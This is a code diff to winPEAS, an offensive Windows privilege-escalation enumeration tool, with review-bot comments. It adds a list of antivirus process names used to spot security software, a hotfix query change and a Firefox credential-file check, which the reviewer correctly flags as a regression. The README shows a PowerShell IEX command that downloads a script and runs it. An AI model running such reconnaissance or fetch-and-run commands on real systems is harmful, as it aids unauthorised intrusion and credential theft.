+ { "IObit Security 360", new HashSet() { "is360tray.exe", "is360init.exe", "is360srv.exe", "e_privacysweeper.exe", "a_hijackscan.exe", "g_portable.exe", "d_powerfuldelete.exe", "b_securityholes.exe", "is360updater.exe", "unins000.exe", "f_pctuneup.exe", "imf_freesoftwaredownloader.exe", "c_passivedefense.exe", } },
+ { "K7AntiVirus Plus by K7 Computing Pvt Ltd", new HashSet() { "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7tlinettemp.exe", "k7tshlpr.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7tsecurityuninstall.exe", "k7rtscan.exe", "k7avscan.exe", "k7crvsvc.exe", "k7tsdbg.exe", "k7emlpxy.exe", } },
+ { "K7AntiVirus Premium by K7 Computing Pvt Ltd", new HashSet() { "k7quervarcleaningtool.exe", "k7ndfhlpr.exe", "healthmon.exe", "k7avqrnt.exe", "k7tliehistory.exe", "k7tlusbvaccine.exe", "k7tsstart.exe", "k7tsalrt.exe", "k7tlwintemp.exe", "k7mebezatencremovaltool.exe", "k7tlinettemp.exe", "k7tsmain.exe", "k7tshlpr.exe", "k7tssplh.exe", "k7disinfectorgui.exe", "k7tlvirtkey.exe", "k7tlmtry.exe", "k7fwsrvc.exe", "k7tsreminder.exe", "k7tsecurity.exe", "k7avmscn.exe", "k7ctscan.exe", "k7rtscan.exe", "k7tsnews.exe", "k7avscan.exe", "k7crvsvc.exe", "k7emlpxy.exe", "k7tsupdt.exe", } },
+ { "Kaspersky Anti-Ransomware Tool for Business", new HashSet() { "anti_ransom_gui.exe", "dump_writer_agent.exe", "anti_ransom.exe", } },
+ { "Kaspersky Anti-Virus 2011", new HashSet() { "kldw.exe", } },
+ { "Kaspersky Anti-Virus 2013", new HashSet() { "ffcert.exe", } },
+ { "Kaspersky Anti-Virus Personal", new HashSet() { "kavsend.exe", "kavsvc.exe", "getsysteminfo.exe", "uninstall.exe", } },
+ { "Kaspersky Antivirus", new HashSet() { "avp.exe", } },
+ { "Kaspersky", new HashSet() { "klnagent.exe", } },
+ { "Malwarebytes", new HashSet() { "mbam.exe", "mbar.exe", "mbae.exe", } },
+ { "McAfee All Access – AntiVirus Plus", new HashSet() { "compatibilitytester.exe", "mispreg.exe", "mcods.exe", "mcvsmap.exe", "mcocrollback.exe", "mpfalert.exe", "mcvulalert.exe", "mvsinst.exe", "mcupdmgr.exe", "mcpvtray.exe", "mcvuladmagnt.exe", "mcvulunpk.exe", "qcshm.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcvsshld.exe", "mcinstru.exe", "mcvulcon.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "mcsvrcnt.exe", "mcvulusragnt.exe", "shrcl.exe", "mcodsscan.exe", "mcapexe.exe", "mcautoreg.exe", "mcinfo.exe", "mcvulctr.exe", "svcdrv.exe", } },
+ { "McAfee AntiSpyware", new HashSet() { "msssrv.exe", "mcspy.exe", "msscli.exe", } },
+ { "McAfee AntiVirus Plus", new HashSet() { "mispreg.exe", "mcvsmap.exe", "mcods.exe", "mcactinst.exe", "mcocrollback.exe", "mpfalert.exe", "mcinsupd.exe", "langsel.exe", "mvsinst.exe", "mcshell.exe", "mfehidin.exe", "mchlp32.exe", "mcupdmgr.exe", "saupd.exe", "uninstall.exe", "mcawfwk.exe", "qcshm.exe", "mcsacore.exe", "mcoemmgr.exe", "qcconsol.exe", "mcuihost.exe", "mcinstru.exe", "mcvsshld.exe", "mcoobeof.exe", "mcsync.exe", "firesvc.exe", "qccons32.exe", "saui.exe", "mcsvrcnt.exe", "shrcl.exe", "mcsmtfwk.exe", "mcautoreg.exe", "mcuninst.exe", "mcinfo.exe", "actutil.exe", } },
+ { "McAfee Antivirus", new HashSet() { "mcafee.exe", } },
+ { "NANO Antivirus beta by Nano Security Ltd", new HashSet() { "nanoreportc64.exe", "nanorst.exe", "uninstall.exe", "nanoreport.exe", "nanosvc.exe", "nanoav64.exe", "nanoreportc.exe", } },
+ { "NANO-Antivirus", new HashSet() { "nanoav.exe", } },
+ { "Norton Antivirus", new HashSet() { "nortonsecurity.exe", } },
+ { "PCMatic", new HashSet() { "pcmaticpushcontroller.exe", "pcmaticrt.exe", } },
+ { "Panda Security", new HashSet() { "psanhost.exe", } },
+ { "Panda", new HashSet() { "avengine.exe", } },
+ { "Quick Heal AntiVirus Pro", new HashSet() { "delnboot.exe", "0000007c_afupdfny.exe", "asmain.exe", "asclsrvc.exe", "acappaa.exe", "activate.exe", } },
+ { "Quick Heal Total Security", new HashSet() { "delnboot.exe", "contact.exe", "activate.exe", "acappaa.exe", } },
+ { "Sophos Anti-Rootkit 1.5.0", new HashSet() { "helper.exe", "svrtcli.exe", "sctcleanupservice.exe", "native.exe", "svrtservice.exe", "svrtgui.exe", "sarcli.exe", "sctboottasks.exe", } },
+ { "Sophos Anti-Virus", new HashSet() { "sav32cli.exe", "savprogress.exe", "savservice.exe", "native.exe", "swi_di.exe", "backgroundscanclient.exe", "savmain.exe", "forceupdatealongsidesgn.exe", "swc_service.exe", "savproxy.exe", "savcleanupservice.exe", "savadminservice.exe", } },
+ { "Symantec Endpoint Protection", new HashSet() { "ccsvchst.exe", } },
+ { "Symantec", new HashSet() { "sepwscsvc64.exe", } },
+ { "Total Defense Anti-Virus", new HashSet() { "caoscheck.exe", "ccprovsp.exe", "caschelp.exe", "caisstutorial.exe", "ccwatcher.exe", "cawsc.exe", "ccevtmgr.exe", "ccprovep.exe", "casc.exe", "cclogconfig.exe", "ccschedulersvc.exe", "cckasubmit.exe", "ccproxysrvc.exe", "caunst.exe", } },
+ { "Trend micro", new HashSet() { "uiwinmgr.exe", "ntrtscan.exe", "tmntsrv.exe", "pccpfw.exe", } },
+ { "VIPRE Advanced Security by ThreatTrack Security", new HashSet() { "sbamtray.exe", "sbamwsc.exe", "sbamcommandlinescanner.exe", "sbamcreaterestore.exe", "sbamsvc.exe", "avcproxy.exe", "sbbd.exe", } },
+ { "VIPRE Antivirus by GFI Software", new HashSet() { "sbamtray.exe", "sbsetupdrivers.exe", "sbamsafemodeui.exe", "sbpimsvc.exe", "sbamwsc.exe", "sbrc.exe", "sfe.exe", "sbagentdiagnostictool.exe", "sbamcommandlinescanner.exe", "sbamsvc.exe", "sbamcreaterestore.exe", "sbamui.exe", } },
+ { "ViRobot Anti-Ransomware by HAURI", new HashSet() { "vrbbdsvc.exe", "uninstall.exe", "vrbbdlogviewer.exe", "vrbbdbackup.exe", "vrpuller.exe", } },
+ { "ViRobot Internet Security 2011 by HAURI", new HashSet() { "hvrpcuselock.exe", "hvrlogview.exe", "hvreasyrobot.exe", "hvrsetup.exe", "hvrfilewipe.exe", "hvrmalsvc.exe", "hvrtrafficviewer.exe", "hvrscan.exe", "hvrcontain.exe", "hvrquarantview.exe", "hvrtray.exe", } },
+ { "Webroot", new HashSet() { "wrsa.exe", } },
+ { "Windows defender", new HashSet() { "msmpeng.exe", "mpcmdrun.exe", "msascuil.exe", "windefend.exe", "msascui.exe", "msmpsvc.exe", } },
+ { "Zillya Internet Security by ALLIT Service", new HashSet() { "drvcmd.exe", "ziscore.exe", "keyboard.exe", "systemresearchtool.exe", "zis.exe", "zisnet.exe", "conscan.exe", "zisupdater.exe", "zisaux.exe", "ziships.exe", } },
+ { "Zillya! Antivirus by ALLIT Service", new HashSet() { "wscmgr.exe", "drvcmd.exe", "zillya.exe", "zavaux.exe", "reporter.exe", "autoruntool.exe", "taskmanagertool.exe", } },
+ { "Zillya! Internet Security by ALLIT Service", new HashSet() { "restoretool.exe", "drvcmd.exe", "wscmgr.exe", "zefcore.exe", "zefsvc.exe", "fwdisabler.exe", "zefaux.exe", "backuphostfile.exe", "conscanner.exe", "reporter.exe", "autoruntool.exe", "zef.exe", "taskmanagertool.exe", } },
+ { "ZoneAlarm Anti-Ransomware by Check Point Software", new HashSet() { "zup.exe", "consrvhost.exe", "zaarupdateservice.exe", "zaar.exe", "sbacipollasrvhost.exe", "uninst.exe", } },
+ { "ZoneAlarm Antivirus by Check Point, Inc", new HashSet() { "threatemulation.exe", "multiscan.exe", "restoreutility.exe", "vsmon.exe", "zatray.exe", "multifix.exe", } },
+ { "ZoneAlarm by Check Point, Inc", new HashSet() { "instmtdr.exe", "zatutor.exe", "cpes_clean.exe", "multiscan.exe", "zauninst.exe", "zlclient.exe", "multifix.exe", } }
};
+ // reverse lookup list
+ public static Dictionary> AVVendorsByProcess = new Dictionary>();
+
+ static DefensiveProcesses()
+ {
+ // initialize the structure here
+ foreach (var kvp in Definitions)
+ {
+ var vendor = kvp.Key;
+
+ foreach (var executable in kvp.Value)
+ {
+ var sanitizedExecutable = executable.Trim().ToLower();
+
+ if (!AVVendorsByProcess.ContainsKey(sanitizedExecutable))
+ {
+ AVVendorsByProcess.Add(sanitizedExecutable, new HashSet() { vendor });
+ }
+ else
+ {
+ AVVendorsByProcess[sanitizedExecutable].Add(vendor);
+ }
+ }
+ }
+ }
}
}
diff --git a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
index 275b762..fcf542f 100644
--- a/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
+++ b/winPEAS/winPEASexe/winPEAS/Info/SystemInfo/SystemInfo.cs
@@ -133,7 +133,7 @@ namespace winPEAS.Info.SystemInfo
IPGlobalProperties properties = IPGlobalProperties.GetIPGlobalProperties();
string dnsDomain = properties.DomainName;
- const string query = "SELECT HotFixID FROM Win32_QuickFixEngineering";
+ const string query = "SELECT HotFixID,InstalledOn FROM Win32_QuickFixEngineering";
using (var search = new ManagementObjectSearcher(query))
{
@@ -142,7 +142,7 @@ namespace winPEAS.Info.SystemInfo
string hotfixes = "";
foreach (ManagementObject quickFix in collection)
{
- hotfixes += quickFix["HotFixID"].ToString() + ", ";
+ hotfixes += quickFix["HotFixID"] + " (" + quickFix["InstalledOn"] + "), ";
}
results.Add("Hostname", strHostName);
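Review bot: The new line renders `quickFix["InstalledOn"]` straight into the string, but that WMI property is an opaque object that may be null or an empty string on hosts where the install date was not recorded, and when present it is a locale-formatted date, so the output can read `KB5001234 ()` and the dates are not comparable across hosts. Since the install date is the main value of this change (how stale the patch level is), it would be better to fall back cleanly when it is missing, e.g. `var installed = quickFix["InstalledOn"]?.ToString(); hotfixes += string.IsNullOrWhiteSpace(installed) ? $"{quickFix["HotFixID"]}, " : $"{quickFix["HotFixID"]} ({installed}), ";`. A short comment such as `// InstalledOn is locale-formatted and may be empty; shown as-is for the operator` would set expectations for readers of the report. The enclosing method and the `results` dictionary it writes to start and end outside this hunk.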
diff --git a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
index a067c87..31d6c61 100644
--- a/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
+++ b/winPEAS/winPEASexe/winPEAS/KnownFileCreds/Browsers/Firefox/Firefox.cs
@@ -120,7 +120,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
string firefoxCredentialFile4 = $"{directory}\\{"key4.db"}";
if (File.Exists(firefoxCredentialFile4))
{
- results.Add(firefoxCredentialFile4);
+ results.Add(firefoxCredentialFile3);
}
}
}
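Review bot: The replaced line records `firefoxCredentialFile3` inside the branch that checks `File.Exists(firefoxCredentialFile4)`, so when only `key4.db` exists (the key store used by current Firefox versions) the path reported is the `key3.db` path, which was presumably not found, and `key4.db` itself is never reported. Unless there is an intent not visible here, this looks like a regression; the line should stay `results.Add(firefoxCredentialFile4);`. If `firefoxCredentialFile3` was already added by a preceding `File.Exists` check (outside this hunk, so I cannot confirm), the change would also duplicate that entry. The enclosing method starts and ends outside this hunk.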
diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
index c819feb..19a037c 100755
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj
@@ -118,6 +118,7 @@
+
@@ -1002,6 +1003,7 @@
+
@@ -1038,6 +1040,11 @@
+
+
+
+
+
@@ -1058,7 +1065,7 @@
-
+
@@ -1068,6 +1075,10 @@
+
+
+
+
diff --git a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
index 0ca5182..faa7a28 100755
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
@@ -5,7 +5,7 @@
- fileanalysis debug
+ cloudinfo -network="auto" -ports="21,22,445"
debug
diff --git a/winPEAS/winPEASps1/README.md b/winPEAS/winPEASps1/README.md
index 82f1232..ddf3fc8 100755
--- a/winPEAS/winPEASps1/README.md
+++ b/winPEAS/winPEASps1/README.md
@@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re
```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
+```
## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
-
-
-By Polop